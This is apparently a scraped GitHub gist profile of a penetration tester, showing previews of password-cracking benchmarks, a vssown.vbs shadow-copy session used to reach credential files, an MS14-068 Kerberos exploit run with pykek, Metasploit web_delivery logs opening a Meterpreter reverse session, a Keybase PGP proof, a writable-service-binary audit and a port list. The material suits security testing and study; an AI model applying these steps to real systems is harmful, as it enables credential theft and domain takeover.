Skip to content

Instantly share code, notes, and snippets.

View jstnkndy's full-sized avatar

Justin Kennedy jstnkndy

View GitHub Profile
Hash.Type......: MD5
Speed.GPU.#1...: 6207.8M/s
Speed.GPU.#2...: 6224.3M/s
Speed.GPU.#3...: 6222.7M/s
Speed.GPU.#4...: 6222.8M/s
Speed.GPU.#5...: 6207.4M/s
Speed.GPU.#6...: 6221.6M/s
Speed.GPU.#7...: 6207.2M/s
Speed.GPU.#*...: 43513.8M/s
@jstnkndy
jstnkndy / gist:bd87b21be454084f67d7
Created May 20, 2014 21:53
JTR Benchmark - tank
./john --test
Will run 32 OpenMP threads
Benchmarking: descrypt, traditional crypt(3) [DES 128/128 AVX-16]... (32xOMP) DONE
Many salts: 73400K c/s real, 2290K c/s virtual
Only one salt: 38535K c/s real, 1202K c/s virtual
Benchmarking: bsdicrypt, BSDI crypt(3) ("_J9..", 725 iterations) [DES 128/128 AVX-16]... (32xOMP) DONE
Many salts: 2441K c/s real, 76407 c/s virtual
Only one salt: 1466K c/s real, 45867 c/s virtual
# Start the Volume Shadow Service
C:\bak>cscript vssown.vbs /start
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.
[*] Signal sent to start the VSS service.
# Create a Volument Shadow Copy, C is the drive where the files reside, this may not always be C
@jstnkndy
jstnkndy / gist:a2f5326a0e5d4cb412a5
Created December 6, 2014 00:05
MS14-068 in action
git clone https://github.com/bidord/pykek
echo 127.0.0.1 msfdc01.metasploitable.local >> /etc/hosts
[*] [2014.12.05-23:43:51] 172.16.80.100 web_delivery - Delivering Payload
[*] [2014.12.05-23:43:53] Sending stage (770048 bytes) to 172.16.80.100
[*] Meterpreter session 12 opened (172.16.80.225:4444 -> 172.16.80.100:57204) at 2014-12-05 23:44:12 +0000
20141205-23:44 - 192.168.153.129 exploit(payload_inject) > sessions -i 12
[*] Starting interaction with 12...
#!/usr/bin/python
import sys, requests
def usage():
print 'Usage: python %s ' % sys.argv[0]
def main():
if len(sys.argv) != 5:

Keybase proof

I hereby claim:

  • I am jstnkndy on github.
  • I am jstnkndy (https://keybase.io/jstnkndy) on keybase.
  • I have a public key whose fingerprint is FBB7 24C7 49C7 5C6F F61D BB37 7BCB 00C9 1BC9 1458

To claim this, I am signing this object:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1
mQINBFOsTdQBEACcbca5WpSCz00cZoJFuU77MVR3Esbw4JuD0Lkwp1jbOzne7+ul
58mfA+RqvApV2d7Kk4kdVzdBrWropYOMfYAoTPCasrpZ6dyXtJoVmfldn6d7RXJB
xm+A8NFi8e1XzM6AbIT/gvCkZefUN1AQ5jeN5Hh/+S/VWz9bbsfKnYxgv181DT4C
xbQv4q0NMrZmKEkFh4KLAQBY+DCnCwvXuTlhpuQ+1uBC/S2VVTBcvN1i0CLLy9FW
TkvTQWeR8nCJ3TTipkyiifZpRFMb0v/YmZ1NQQxTLkQFlWrPEczgTHvl80Gq75V9
iA1w41j9XR+CG0D3CrmfoT/spiikydGojRV9vGvpVtknmVddnS5FrNRVEMdeb3ge
BR8HD4zUnj1zjSMDOaPBSCb9bX/NDLQMMrPX545NwYVjjHItChMjuxZcbW6QZ3cn
Path : c:\program files (x86)\trend micro\client server security agent\ccsf\tmccsf.exe
Used by services : TmCCSF
File write allowed for groups : Everyone
Full control of directory allowed for groups : Everyone
Path : c:\program files (x86)\trend micro\client server security agent\hostedagent\svcgenerichost.exe
Used by services : svcGenericHost
File write allowed for groups : Everyone
Full control of directory allowed for groups : Everyone
80
23
443
21
22
25
3389
110
445
139
631
161
137
123
138
1434
445
135
67
53